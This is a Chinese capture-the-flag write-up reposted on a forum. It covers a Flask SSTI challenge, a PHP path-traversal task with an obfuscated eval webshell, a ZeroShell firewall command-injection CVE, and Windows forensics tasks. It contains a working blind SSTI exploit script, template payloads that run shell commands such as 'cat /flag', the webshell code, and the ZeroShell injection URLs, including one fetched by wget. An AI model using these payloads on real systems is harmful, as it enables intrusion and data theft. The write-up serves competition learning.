第二届国赛铁三wp
第二届国赛缺东西去我blog找👇
第二届长城杯/铁三 | DDL'S BLOG
web
Safe_Proxy
源码标题
from flask import Flask, request, render_template_stringimport socketimport threadingimport htmlapp = Flask(__name__)@app.route('/', methods="GET"])def source(): with open(__file__, 'r', encoding='utf-8') as f: return'<pre>'+html.escape(f.read())+'</pre>'@app.route('/', methods=["POST"])def template(): template_code = request.form.get("code") # 安全过滤 blacklist = ['__', 'import', 'os', 'sys', 'eval', 'subprocess', 'popen', 'system', '\r', '\n'] for black in blacklist: if black in template_code: return"Forbidden content detected!" result = render_template_string(template_code) print(result) return'ok'if result is not None else'error'class HTTPProxyHandler: def __init__(self, target_host, target_port): self.target_host = target_host self.target_port = target_port def handle_request(self, client_socket): try: request_data = b"" while True: chunk = client_socket.recv(4096) request_data += chunk if len(chunk) < 4096: break if not request_data: client_socket.close() return with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as proxy_socket: proxy_socket.connect((self.target_host, self.target_port)) proxy_socket.sendall(request_data) response_data = b"" while True: chunk = proxy_socket.recv(4096) if not chunk: break response_data += chunk header_end = response_data.rfind(b"\r\n\r\n") if header_end != -1: body = response_data else: body = response_data response_body = body response = b"HTTP/1.1 200 OK\r\n" \ b"Content-Length: " + str(len(response_body)).encode() + b"\r\n" \ b"Content-Type: text/html; charset=utf-8\r\n" \ b"\r\n" + response_body client_socket.sendall(response) except Exception as e: print(f"Proxy Error: {e}") finally: client_socket.close()def start_proxy_server(host, port, target_host, target_port): proxy_handler = HTTPProxyHandler(target_host, target_port) server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_socket.bind((host, port)) server_socket.listen(100) print(f"Proxy server is running on {host}:{port} and forwarding to {target_host}:{target_port}...") try: while True: client_socket, addr = server_socket.accept() print(f"Connection from {addr}") thread = threading.Thread(target=proxy_handler.handle_request, args=(client_socket,)) thread.daemon = True thread.start() except KeyboardInterrupt: print("Shutting down proxy server...") finally: server_socket.close()def run_flask_app(): app.run(debug=False, host='127.0.0.1', port=5000)if __name__ == "__main__": proxy_host = "0.0.0.0" proxy_port = 5001 target_host = "127.0.0.1" target_port = 5000 # 安全反代,防止针对响应头的攻击 proxy_thread = threading.Thread(target=start_proxy_server, args=(proxy_host, proxy_port, target_host, target_port)) proxy_thread.daemon = True proxy_thread.start() print("Starting Flask app...") run_flask_app() ssti没回应,
法一盲注
附上脚本
import requests
import base64
import string
import time
from urllib.parse import urlencode
flag=""
part1="{
{()|attr('_''_class_''_')|attr('_''_mro_''_')|attr('_''_getitem_''_')(1)|attr('_''_subclasses_''_')()|attr('_''_getitem_''_')(133)|attr('_''_init_''_')|attr('_''_globals_''_')|attr('_''_getitem_''_')('po''pen')('"
part3="')|attr('re''ad')()}}"
url="http://8.147.128.179:22740"
for i in range(1,50): #["(head -c n /flag | tail -c 1)"= "j" ] && sleep 2
for j instring.printable:
print(flag)
part2 = "[ \"$(head -c " + str(i) + " /flag | tail -c 1)\" = \"" + j + "\" ] && sleep 2"
coco=part1 + part2 + part3
payload=urlencode(coco)
print(payload)
time1=time.time()
data={
"code": payload
}
requests.post(url,data=data)
time2=time.time()
if(time2-time1>1.5):
flag+=j
break
""""
{
{()|attr('_''_class_''_')|attr('_''_mro_''_')|attr('_''_getitem_''_')(1)|attr('_''_subclasses
_''_')()|attr('_''_getitem_''_')(133)|attr('_''_init_''_')|attr('_''_globals_''_')|attr('_''_getitem_''_')('po''pen')('sleep 10')|attr('re''ad')()}}"""
#if head -c /flag ) 法二覆盖
本地调试源码(return'ok'if result is not None else'error'改成return'ok'+result if result is not None else'error')然后用焚情打本地
覆盖app.py路由
ls / >app.py
{%set gl='_'2+'globals'+'_'2%}{%set bu='_'2+'builtins'+'_'2%}{%set im='_'2+'i''mport'+'_'2%}{%set hz='so'[::-1]%}{
{cycler.next(hz)['p''open']('ls+/>app.py').read()}} cat /flag >app.py
{%set gl='_'2+'globals'+'_'2%}{%set bu='_'2+'builtins'+'_'2%}{%set im='_'2+'i''mport'+'_'2%}{%set hz='so'[::-1]%}{
{cycler.next(hz)['p''open']('cat+/flag>app.py').read()}} hello_web
这个当初没做出来,是将../更换成了空,然后..././用来目次穿越就可以了,
tips文件是一个phpinfo
hackme.php内里是一句话木马
<?php highlight_file(__FILE__);$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};$rVkKjU=$lapUCm{7}.$lapUCm{13};$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30};eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));?> eval换成echo输出出来看看
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEyMDQwMTkzOS5wbmcmcG9zX2lkPTYwMjdwaGxj
然后再修改一下让他输出
<?php highlight_file(__FILE__);
$lJbGIY="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxME";
$OlWYMv="zqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrel";
$lapUCm=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$YwzIst=$lapUCm{3}.$lapUCm{6}.$lapUCm{33}.$lapUCm{30};$OxirhK=$lapUCm{33}.$lapUCm{10}.$lapUCm{24}.$lapUCm{10}.$lapUCm{24};
$YpAUWC=$OxirhK{0}.$lapUCm{18}.$lapUCm{3}.$OxirhK{0}.$OxirhK{1}.$lapUCm{24};
$rVkKjU=$lapUCm{7}.$lapUCm{13};$YwzIst.=$lapUCm{22}.$lapUCm{36}.$lapUCm{29}.$lapUCm{26}.$lapUCm{30}.$lapUCm{32}.$lapUCm{35}.$lapUCm{26}.$lapUCm{30};
eval($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));
#echo($YwzIst("JHVXY2RhQT0iZVFPTGxDbVRZaFZKVW5SQW9iUFN2anJGeldaeWNIWGZkYXVrcUdnd05wdElCS2lEc3hNRXpxQlprT3V3VWFUS0ZYUmZMZ212Y2hiaXBZZE55QUdzSVdWRVFueGpEUG9IU3RDTUpyZWxtTTlqV0FmeHFuVDJVWWpMS2k5cXcxREZZTkloZ1lSc0RoVVZCd0VYR3ZFN0hNOCtPeD09IjtldmFsKCc/PicuJFl3eklzdCgkT3hpcmhLKCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVKjIpLCRZcEFVV0MoJHVXY2RhQSwkclZrS2pVLCRyVmtLalUpLCRZcEFVV0MoJHVXY2RhQSwwLCRyVmtLalUpKSkpOw=="));
echo "\n";
$uWcdaA="eQOLlCmTYhVJUnRAobPSvjrFzWZycHXfdaukqGgwNptIBKiDsxMEzqBZkOuwUaTKFXRfLgmvchbipYdNyAGsIWVEQnxjDPoHStCMJrelmM9jWAfxqnT2UYjLKi9qw1DFYNIhgYRsDhUVBwEXGvE7HM8+Ox==";
echo $YwzIst($OxirhK($YpAUWC($uWcdaA,$rVkKjU*2),$YpAUWC($uWcdaA,$rVkKjU,$rVkKjU),$YpAUWC($uWcdaA,0,$rVkKjU)));
?> 看不到,看源代码
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEyMTExNTQyMS5wbmcmcG9zX2lkPXAzTG9BcVF6
出一句话木马,蚁剑毗连走disable_function
http://eci-2zed8l51f9k8f9ptch3w.cloudeci1.ichunqiu.com/index.php?file=..././hackme.php ##
zeroshell
标题内容:
小路是一名练习生,接替公司前任网管的工作,一天发现公司网络出口出现了非常的通讯,现须要通过回溯出口流量对非常点位(防火墙)举行定位,并确定非常的装备。然后举行深度取证查抄(须要获取root权限)。如今须要你从网络攻击数据包中找出毛病攻击的会话,分析会话编写exp或数据包重放获取防火墙装备管理员权限,查找防火墙装备上安装的木马,然后分析木马外联地点和通讯密钥以及木马启动项位置。
1
.从数据包中找出攻击者使用毛病开展攻击的会话(攻击者实行了一条下令),写出该会话中设置的flag, 结果提交情势:flag{xxxxxxxxx}
(本题附件见于提前下载的加密附件2e9c01da1d333cb8840968689ed3bc57.7z,解压暗码为11b0526b-9cfb-4ac4-8a75-10ad9097b7ce )
搜base64的flag出包,然后解码referer
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNjIxMTMwNTMzNC5wbmcmcG9zX2lkPTlXZW55emw1
2
通过毛病使用获取装备控制权限,然后查找装备上的flag文件,提取flag文件内容,结果提交情势:flag{xxxxxxxxxx}
这个是cve,第一种方法是在网上找,
https://developer.aliyun.com/article/1334090 /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aid%0A%27 https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEyMjQ1ODQ0Mi5wbmcmcG9zX2lkPTRQMmJrOWlm
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNTE0MTYzNjgxMC5wbmcmcG9zX2lkPVJPejRkeUlm
第二种是看流量包,用流量包内里的(就是上边第一问的这个)
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNjIxMTYwNDA4NS5wbmcmcG9zX2lkPVE4Y1JUQ2xk
GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec='ps%20-ef'%0A' HTTP/1.1\r\n 3
flag{202.115.89.103}
找出受控机防火墙装备中驻留木马的外联域名或IP地点,结果提交情势:flag{xxxx},如flag{ www.abc.com} 或 flag{16.122.33.44}
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEyMzIzNjgyMy5wbmcmcG9zX2lkPUxqcjdrMEJP
4
flag为.nginx
请写出木马进程实行的本体文件的名称,结果提交情势:flag{xxxxx},仅写文件名不加路径
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEzMzMwODQ3MC5wbmcmcG9zX2lkPURmcURzaUpz
ls -l /proc/10565/exe 来查找运行文件;找到为.nginx
他还是个隐藏文件,比赛结束之后复现可能没有上边的↑关于外部链接的进程 https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEzMzgwMTAzNy5wbmcmcG9zX2lkPUtEeGhUUVRl
5
请提取驻留的木马本体文件,通过逆向分析找出木马样本通讯使用的加密密钥flag{11223344qweasdzxc}
直接xxd就可以观看了
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEzNDE1NzkyMi5wbmcmcG9zX2lkPWR1TXgzSW5n
下载方法2
没试过,听说可以
wget "http://61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A/etc/sudo%20tar%20-cf%20/dev/null%20/dev/null%20--checkpoint=1%20--checkpoint-action=exec=%27cat%20/tmp/.nginx%27%0A%27"
6
请写出驻留木马的启动项,注意写出启动文件的完备路径。结果提交情势:flag{xxxx},如flag{/a/b/c}
在shell中不停查询⽂件,探求包罗".nginx"字符串的⽂件,终极在/var主⽬录下找到
flag{/var/register/system/startup/scripts/nat/File}
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzEzNDUyNjg0NC5wbmcmcG9zX2lkPUZyRk4weHFi
WinFT
某单元网管一样平常巡检中发现某员工电脑(IP:192.168.116.123)存在非常外连及数据传输举动,随后立刻对该电脑举行断网处理处罚,并启动网络安全应急预案举行排查。
(本题附件见于提前下载的加密附件82f13fdc9f7078ba29c4a6dcc65d8859.7z,解压暗码为3604e2f3-585a-4972-a867-3a9cc8d34c1d )
_1
受控机木马的回连域名及ip及端口是(示例:flag{xxx.com:127.0.0.1:2333})
法一
文档内里有个病毒exe文件;大概在火绒剑的网络上面也可以看到这个exe毒
点开桌面的火绒剑,再点击网络可以看到远程地点 将文件丢到微步云沙箱https://s.threatbook.com/可以找到回连地点
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNTE1Mzc1MTkzNS5wbmcmcG9zX2lkPWhXVTJZa1pO
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNTE1NDY0OTI0Mi5wbmcmcG9zX2lkPXU4OVh2Wk5H
flag{miscsecure.com:192.168.116.130:443}
法二
分析内里的数据包
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0MDAyMTg0NC5wbmcmcG9zX2lkPWh4MU5aOWN2
_2
受控机启动项中潜伏flag是
按 Win + R 打开运行对话框。
输入 taskschd.msc,然后按回车键。
内里就这一个东西
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0MTAzNTg5MC5wbmcmcG9zX2lkPWRZT0U5U3c1
f^l^a^g^:JiM3ODsmIzEwNTsmIzk5OyYjMTAxOyYjNjUyOTI7JiMxMDI7JiMxMDg7JiM5NzsmIzEwMzsmIzMyOyYjMTA1OyYjMTE1OyYjMzI7JiMxMjM7JiM2NTsmIzY5OyYjODM7JiM5NTsmIzEwMTsmIzExMDsmIzk5OyYjMTE0OyYjMTIxOyYjMTEyOyYjMTE2OyYjMTA1OyYjMTExOyYjMTEwOyYjOTU7JiM5NzsmIzEwODsmIzEwMzsmIzExMTsmIzExNDsmIzEwNTsmIzExNjsmIzEwNDsmIzEwOTsmIzk1OyYjMTA1OyYjMTE1OyYjOTU7JiM5NzsmIzExMDsmIzk1OyYjMTAxOyYjMTIwOyYjOTk7JiMxMDE7JiMxMDg7JiMxMDg7JiMxMDE7JiMxMTA7JiMxMTY7JiM5NTsmIzEwMTsmIzExMDsmIzk5OyYjMTE0OyYjMTIxOyYjMTEyOyYjMTE2OyYjMTA1OyYjMTExOyYjMTEwOyYjOTU7JiM5NzsmIzEwODsmIzEwMzsmIzExMTsmIzExNDsmIzEwNTsmIzExNjsmIzEwNDsmIzEwOTsmIzEyNTs= https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0MTMzNjc0Ny5wbmcmcG9zX2lkPVV6Z2ZyNHBM
_3
受控机中驻留的flag是
_4
受控源头潜伏的flag是
_5
分析流量,得到压缩包中得到答案
将流量包放入同流合污,foremost,出来有压缩包
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0MzUyOTg2NC5wbmcmcG9zX2lkPWJXV3dFcERh
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0MzkxOTI4NC5wbmcmcG9zX2lkPVIyWVpDRkh2
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0MzkxMDE3Ni5wbmcmcG9zX2lkPUlSNXFIcjUy
火绒报毒,压缩包破坏,关闭防火墙重新foremost一遍
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0NDIxMjkwNS5wbmcmcG9zX2lkPUJkUmFGQ3Fm
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0NDQxNDU0Ni5wbmcmcG9zX2lkPUZnZmJHNVE4
发现不是这个标题,修复一下压缩包,出flag
https://dis.qidao123.com/imgproxy/aHR0cHM6Ly9pbWctaG9tZS5jc2RuaW1nLmNuL2ltYWdlcy8yMDIzMDcyNDAyNDE1OS5wbmc/b3JpZ2luX3VybD1odHRwcyUzQSUyRiUyRmdpdGh1Yi5jb20lMkZEREwwOCUyRmltYWdlcyUyRmJsb2IlMkZpbWclMkZpbWclMkZpbWFnZS0yMDI0MTIxNzE0NDczNDEzMC5wbmcmcG9zX2lkPTdOMVZBRmRX
_6
通过aes解密得到的flag
sc05_1
克日某公司网络管理员老张在对安全装备举行一样平常巡检过程中发现防火墙装备日记中产生了1条高危告警,告警IP为134.6.4.12(简称IP1),在监测到可疑网络活动后,老张立刻对磁盘和内存制做了镜像。为考校本身刚收的第一个徒弟李华,老张循规蹈矩,部署了5道标题。假如你是李华,请你根据提供的防火墙日记、磁盘镜像及内存镜像文件对主机开展网络安全查抄分析,并根据5道标题提示,盘算并提交相应flag。
(本题附件见于提前下载的加密附件38c44f100028b56e09dc48522385fa95.7z,解压暗码为 37af3744-53eb-49fd-854a-f6f79bbf5b1c )
_1
IP1地点初次被哀求时间是多久?盘算内容如:2020/05/18_19:35:10 提交格式:flag{32位大写MD5值}
文档直接ctrl+f搜索就行了
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]